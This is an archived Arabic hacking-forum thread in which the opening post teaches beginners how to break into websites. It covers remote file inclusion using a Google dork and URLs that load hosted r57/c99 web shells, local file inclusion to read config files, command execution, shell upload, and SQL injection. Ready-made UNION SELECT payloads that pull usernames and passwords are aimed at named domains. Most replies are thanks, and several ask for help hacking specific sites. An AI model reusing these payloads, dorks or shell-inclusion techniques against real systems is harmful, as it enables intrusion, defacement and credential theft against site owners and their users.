المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس الثاني: حوار حول الثغرات واستغلالها



ASDELY-ScOrPiOn
06-12-2009, 04:25 PM
كيف الاحوال جميعا

درس اليوم بشرح فيه بعض الثغرات

اللي تفيدنا لما نجي نستهدف موقع
ونلقي فيه الثغرة نعرف ايه هي وايه استثمارها


اولا نجي للثغرة المألوفه

remote file include

remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ

ادراج ملف للتحكم

طيب للتحكم في ايه

اقولك في الموقع اللي عايزين نخترقوا

طيب ايه نوع الملف
بيكون شيل ------ هذ الشيل مرفوع علي استضافه بصيغة txt يتم ربطه بالموقع عن طريق الثغرة
للتحكم في الموقع والسيرفر كامل
---------------------
اوكـ نجيب ثغرة نطبق عليها

Dork:


"Powered by Kmita Tell Friend" "allinurl:/kmitat/"

..................................

طيب dork للي ما يعرفها يعني كود البحث عن الثغرة في مواقع البحث
واللي تحتها هذا هو الكود اللي بنبحث عنوا في غوغل مثلا حتي نري المواقع المصابه به

نجي للاستثمار او الاستغلال
بعض الكلمات اللي لما تراها تعرف انها استغلال
Example:
Expl:
Exploit:
Exploits:
Expl


http://www.xxx.com/kmitam/htmlcode.p...ttp://xxx.com/ txt?

نشرح المثال اللي فوق

http://www.xxx.com (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fwww.xxx.com) عنوان الموقع
ممكن يكون مكتوب في الثغر
kmitam الاسكريبت المصاب

= لادراج الشيل

http://xxx.com/txt?؟ (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fxxx.com%2Ftxt%3F%B F)




شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها

طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ

http://[url]/kmitam/htmlcode.php?file=http://[shll]/ txt?

ثغرة الفايل انكلود بتسمح لنا بأدراج شيل علي الموقع المصاب بها

يعني لو انا عندي موقع اسموا www.vbsilver.com (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fwww.vbsilver.com)
مركب به اسكريبت اسموا phpp هذا السكريبت به ثغرة من نوع ريموت فايل انكلود
استغلالها = ?index.php?gap=shll
طيب عشان اطبقها علي موقعي


www.vbsilver.com/index.php?gap=http://silveeer79.jeeran.com/r57.tx

t?
وهذا شيل روسي رافعوا علي استضافه مجانيه بصيغة txt
'طيب فيه عندنا شيل روسي c99
وشيل r57
وشل sniper-sa وشيلات كتيرة
-Local File Include
او ...Remote File Disclosure
اختصارها lfi
طبعا هي شبيهه بالفايل انكلود
لكنها تسمح بادراج وقراءة الملفات علي السيرفر المصاب بالثغرة

بتكون زي كدا
http://localhost/script/index.php?lfi (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Flocalhost%2Fscript %2Findex.php%3Flfi)
يعني رابط الموقع + السكريبت المصاب + الملف المصاب + تطيبق الاوامر
مثلا احنا عندنا ع الموقع داله اسمها get وعايزين نقرا الكونفيق تبعها
بيكون استغلالها زي كذا
http://localhost/mkportal/index.php?get=config.php
بمعني ان احنا امرنا السيرفر يقري لنا الكونفيق الموجود بملف get الموجود بالاسكريبت mkportal

النوع الثالث

remote command execution

عملها تطبيق الاوامر علي السيرفر مباشرة
طبعا راح نخصص دروس لاوامر اللينكس

مثال عليها

http://www.xxx.com/index.php?cmd=dir

نشرح المثال
هذا الموقع مصاب بثغرة الكوماند
استغلالها بيكون عرض اوامر اللينكس مباشرة علي الموقع المصاب
وهنا امرنا السيرفر بأحضار الملفات والمجلدات للموقع بالامر dir
بأمكاننا أمرة باي اوامر

النوع الرابع
Upload Shell


وهي ثغرة مراكز التحميل
ان وجدت بأمكاننا رفع ملفات خبيثه بصيغة php يعني نرفع الشيل ونضحك علي الموقع
ثغرة سهلها ولا تحتاج شرح :)

لكن بشرحها بالتفصيل فيما بعد

النوع الخامس

Remote SQL Injection

ثغرات خطيرة وانتشرت بكثرة هذة الايام
لان اغلب مبرمجين php يكتبون الان دوالهم بالسكيول والاتصال مع قواعد البيانات

ومهمتها سحب اليوزرات وقراءة الملفات
يعني حسب الثغرة المكتشفه بيكون النتيجه ممكن تجيب لنا باسورد المدير

مثال لها

http://www.milw0rm.com/exploits/6350 (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fwww.milw0rm.com%2F exploits%2F6350)

وهذا دورك البحث

d0rk :: "use your mind"
وهذا الاستغلال


http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws (0x3a3a,username,password),6,7,8,9+from+members/*


او


http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws (0x3a3a,username,password),6,7,8,9+from+members/*

طبعا بتضع الموقع المصاب
واضغط اوكـ

وهو بيطلع لك اليوزر نيمـ والباسورد اذا كان الموقع مصاب

تمني ما يكون فيه غموض

هذا شرح مبسط لبعض الثغرات اللي راح تقابلك كتير

وضعتوا لكمـ قبل ان ابدأ باستهداف اختراق المواقع
حتي نعرف ازاي نستغل اي ثغرة في الاختراق

----------------

راجع الدرس اكتر من مرة فهو مدخلك للدر س القادمـ

maknassyhacker
06-14-2009, 01:10 AM
درس مفيد لكن يلزم خبرة في لينوكس و لغات البرمجة للتمكن من الموضوع.
أرجو افادتنا قدر المستطاع

ViRuS HaCkEr
06-15-2009, 11:21 PM
مشكوور اخوي جهد رائع

maknassyhacker
06-26-2009, 03:16 AM
يعطيك العافيه

Snake HaCkEr
07-01-2009, 01:44 PM
مشكوووووور والله يعطيك الف عافيه

عصام-محمد
07-02-2009, 04:13 PM
عاشت الاياديييييييييييييييييي

هاوي حنانك
07-18-2009, 01:20 AM
سلمت يداك اخي الكريم ,,,,,,

alzaaem
07-19-2009, 12:26 AM
يسلمووووووووو اديك يا حوووووووووووووووت

تحياتي

IbN Al3RaQ
07-19-2009, 11:53 PM
السلام عليكم شكرا جزيلا

مقدمة ميزة وشرح جيد

تحياتي

إبراهيم
07-21-2009, 12:51 AM
ألف شكر لكـ
على الدرس

alzaaem
07-22-2009, 03:25 PM
مشكورر و الله شرح رووعة

و اسلويب سلس لكل مبتدئ

تحياتي

kalla kalla
08-14-2009, 03:00 PM
شكرا لكم اخي الكريم

kalla kalla
08-14-2009, 03:56 PM
والله شويه صعب الدرس عليه


ولكن سؤال كيف انشئ الشل

فرقان لطيف
08-15-2009, 01:47 PM
تسلم يدك يابطل

فرقان لطيف ناجي
08-15-2009, 01:48 PM
يسلم راسك يا خوية

BLACK.JaGuAr
09-12-2009, 02:12 AM
http://www.samysoft.net/forumim/shokr/1/868686.gif

ABOALLEL
09-19-2009, 04:34 AM
مشكور على الدرس

اسد سوريا
09-20-2009, 11:22 AM
ماشاء الله عليك الله يحيمك

أسد القدس
09-25-2009, 07:05 PM
مشكووور ويعطيك الف عافية

هكرور
10-09-2009, 10:06 AM
مشكور اخوي ع الدرس
ويعطيك العافيه عاشت الايأدي

هكر شمر
10-13-2009, 03:47 AM
مشكور إلى الأمام

°•ஓ•°M G R N°•ஓ•°
10-15-2009, 02:53 AM
يعطيك ألف ألف عافيه على هالدرس
ومشكور وماقصرت
دمت بود
..
~

عا نت بر
10-17-2009, 07:04 PM
جزاك الله خير يا اخى والله مش لاقى كلمه شكر مناسبه
لانك من الذين يتعلمو ليفيدو غيرهم وليث من الذين يتعلمون ليتميزون
فجزاك الله خير
تقبل مرورى المرفك باعجابى الشديد
اخوك فى الله زاهر ( عابر نت )

DR_zahf
10-31-2009, 09:53 PM
فيـهـآ غمممموص ولحسسه شوي

ويبي لهآ صبر عشآن نفهمهـآ


DR_zahf

HالبغداديH
11-01-2009, 12:19 AM
مشكووووووووووووووووور حبيب عاشت ايدك

fuhrer
11-12-2009, 10:54 AM
تسلم,,,,

وتم التطبيق ,,,,,,

بس ياريت لو سمحت اكتر وضوح لانو بخصوص الدورك لما نطبقه,,

ستمائة الف موقط يطلعون وين نستغل فيهههههههههههههه:confused:

جندي اول للهكر
11-22-2009, 05:02 PM
واللله كبير واللله

جندي اول للهكر
11-22-2009, 05:11 PM
والللله دوره على كيفكك

الإمبراطور السوري
12-29-2009, 06:24 AM
مشكور اخي يسلمو ايديك

ya-ss-ine
12-29-2009, 10:21 AM
walllahhh majhoudatek ya notre presidons
jid jidjid kabbiiira
liyansorka alllahhh
1111000000000000000000000000000000chokreee

الفاني
01-14-2010, 02:06 PM
مشكوووووور والله يعطيك الف عافيه

عطر الكون
01-15-2010, 05:56 PM
مشكوووووور والله يعطيك الف عافيه

Mr.Fito
01-30-2010, 04:31 PM
للاسف انا مش قادر افهم مثال MikTam بس هرجع تانى وحهاول افمها بس يا رب اعرف

ZAKSER
04-20-2010, 07:26 PM
مشششششششششششكور بس ولا في اشياء تلخبط بها جدا مشكور على الدرس

مجنجن البرمجة
05-01-2010, 01:59 AM
مشكوررررر;)

hackr_911
05-13-2010, 11:29 PM
يسلمو حبيب قلبي

momo2001
05-14-2010, 05:46 PM
درس مفيد لكن يلزم خبرة في لينوكس و لغات البرمجة للتمكن من الموضوع.
أرجو افادتنا قدر المستطاع

mrji
05-21-2010, 04:13 PM
65444444465464

hide man
05-21-2010, 08:16 PM
تمام جدا اوى

المبير
05-22-2010, 09:04 PM
شكراااااااااااااااااااااا ااا

هولازور
05-28-2010, 02:04 AM
مشكووووووووووووور

eavil
05-28-2010, 01:41 PM
مشكووووووووووووووووووور

emotion
05-28-2010, 09:03 PM
كل اشكر .,

magedg
05-29-2010, 12:54 PM
شكر موضوع جميل جدا

عاشق القمم
07-01-2010, 02:56 PM
يعطيك الف عافيه على الشرح واصل يالغلا

T!F!NaR
07-13-2010, 01:55 PM
مشكور اخي على الموضوع الرائع
بارك الله فيك و جعله في ميزان حسناتك

khulud
08-02-2010, 10:23 AM
يعطيك الف عافيه

Abdullhadi JC
08-09-2010, 09:35 PM
موضوع جميل ومهم
تحياتي لك اخي...

Mays
08-16-2010, 09:17 PM
جربت جميع الطرق ولآ طريق منهم نفعت بهآي الموقع

http://www.moterfy.com/vb

بليييييييييييز آبي طريقه آكتشف ثغرتهم

XvvX
08-21-2010, 05:50 PM
http://www.samysoft.net/forumim/shokr/1/868686.gif

benzaxoll
08-22-2010, 11:45 PM
مشكور وبارك الله فيك ابدعت بطرحك يعطيك ألف عافية .....

benzaxoll
08-22-2010, 11:53 PM
مشكور وبارك الله فيك ابدعت بطرحك يعطيك ألف عافية .....

naruto. hacker
09-03-2010, 04:22 PM
مشكوروسلمت اناملك تابع تالقك الى لأمام
بالتوفيق للجميع

System 32
09-06-2010, 02:22 AM
مشكوووووووووووووووووووووو ر

Mr.SnAkE
09-13-2010, 05:24 PM
بارك الله فيك

slimane.dz
10-06-2010, 02:14 PM
بارك الله فيك على الافادة

dark_ma
12-06-2010, 04:08 AM
تنممممممممممممممم

dark_ma
12-06-2010, 04:10 AM
454444444444444444442

dark_ma
12-06-2010, 04:11 AM
مشكوووووور والله يعطيك الف عافيه

dark_ma
12-06-2010, 04:13 AM
1111111111111111111111111111111

dark_ma
12-06-2010, 04:15 AM
1111111111111111111111111

dark_ma
12-06-2010, 04:17 AM
جزآك الله خير الجزآء ............

ريكووو
12-26-2010, 09:52 PM
يديك الف عاافيه اخوووي,,

the.punisher
01-21-2011, 01:25 AM
يعطيك الف عافيه على الشرح الوافي

ComputerProgramer
01-27-2011, 01:56 AM
يعطيك العافيه ... بس يبغاله تركييييييييييز

chamsou_23i
02-02-2011, 05:13 PM
شــــــــــــــكرا

thankssssssssssssssssssssssssssss

nsn11
02-03-2011, 04:14 PM
مشكورر نتمنى الاستفادة

mr-memo
02-09-2011, 01:25 PM
مشكور ويعطيك العافيه،تقبل مروري

رواد غضب
05-23-2011, 12:44 PM
السلام عليكم ورحمة الله وبركاته..
أخوي الله يعطيك ألف عافية ومشكور على هذا الموضوع أنا حاليا اقراء فيه ولين ما خلص أن شاء الله أبداء الدرس الثالث
وأرجو قبولي عضو جديد إِلى موقعكم هذا

black.angel
07-25-2011, 10:39 PM
momtaaaaaaaaaaaaaaaaz

mr.e3dam
07-28-2011, 03:26 AM
مشكووووووووووووووووور اخوي

تقبل مروري

Klachenkove
08-01-2011, 05:59 AM
مشكور يا بطل موضوعك مميز

KILL HACER
08-02-2011, 02:37 PM
ايش اللغه المهمه لااختراق المواقع اكيد phpولا لا

احمد الحميد
08-06-2011, 05:35 AM
اخواني احتاج مساعدة الاخوة المهكرين
انا عندي مشكلة واحتاج لمساعدتكم

بن الوليد
08-06-2011, 04:18 PM
السلام عليكم أخىوتى الكريم
أنا أملك منتدى و قد تم أختراقه و لا أدرى أخوتى الكريم هل نتعلم الأختراق لنقن أعداءنا دروساً أم لنحارب أنفسنا، حسبنا الله و نعم الوكيل
أنا بسأل لو حد من الأخوه يقدر يساعدنى لأسترداد قاعدة بياناتنا و أن كان بمقابل
مشكورين و جزاكم الله كل خير

HacKeR_506
08-06-2011, 05:02 PM
يـعـطـيـكـ الـعـآفـيـهـ يــآآ مبـدع

mrshak2011
08-07-2011, 08:24 PM
السلام عليكم
مشكوررر أخي

ابو عمير
08-19-2011, 12:39 AM
اولا اشكرك على الموضوع
ثانيا ابيك تستحميل غبائي شوي
انا ما فهمت ولا شي
اخوي الحين شلون اعرف اذا السكربت مصاب ولا لا!؟
او شلون اعرف اذا اقدر اخترقه ولا

مثال
الحين لعبة حرب التتار عبارة عن سكربت يكرب على استضافة + قاعدة بيانات
طيب ابي اخترق السكربت هذا !

شلوووون ؟

HaCkEd By MIMO
09-08-2011, 05:50 AM
http://www.hejrh.com/images/smilies/2.gif

kapos
09-10-2011, 02:30 AM
الله ينور علي الشغل

hmezkcq
09-10-2011, 03:08 AM
ألف شكر لكـ
على الدرس
إنشاله نغلقو

حنين المجنونه
10-17-2011, 05:28 AM
يسلموووووووووووو الله يعطيك الف عافيه اخوي تدري انا وش عيبي انا عيبي اني معرف ابحث شغره وماعرف استغلها ومعرف ارفع الشيل والله العظيم انا ودي اتعلم على بحث الثغرات ومعرفة استغلالها ورفع الشيل يعني اتمنى تجيبون شرح فيديو في ناس ترا ماتفهم بالكتابه تفهم بالتطبيق فهمتو علي يعني بلييييز ابي شرح فيديو بحث ثغره remote file include وطريقة استغلالها ورفع الشيل طبعا راح يكون الشرح من صاحب الموضوع تقبل مروري

The Haker Of Iraq
11-29-2011, 10:03 PM
يسلموووو ع المووضوع والشرح الرائع

Spire_Barde
02-05-2012, 02:37 AM
شكرا لك على الغموض الرائع
نريد تطبيقات حية 2012 وليس الأزليات و الفرعونيات...

Spire_Barde
02-14-2012, 09:53 PM
شكرا لك على المعلومات القيمة

lOve Bomb
02-14-2012, 10:11 PM
ممتاز اخي
ولكن حاول فدر المستطاع تبسيط الشرح للمبتدئين أمثالي

بحر وصعب مرساه
02-17-2012, 05:28 AM
بارك الله فيكم على الجهوووود المبذووله

هكر الديوانيه
03-16-2012, 09:01 PM
مشكور ع الجهد البذول منك يا اخي الكريم

house21
04-30-2012, 03:01 AM
:يا قـــدس يا منارة الشرائع،:
يا طفلة جميلة محروقة الاصابع،
حزينة عيناك يا مدينة البتول،
يا واحة ظليلة مر بها الرسول،
حزينة حجارة الشوارع،
حزينة مأذن الجوامع،
3191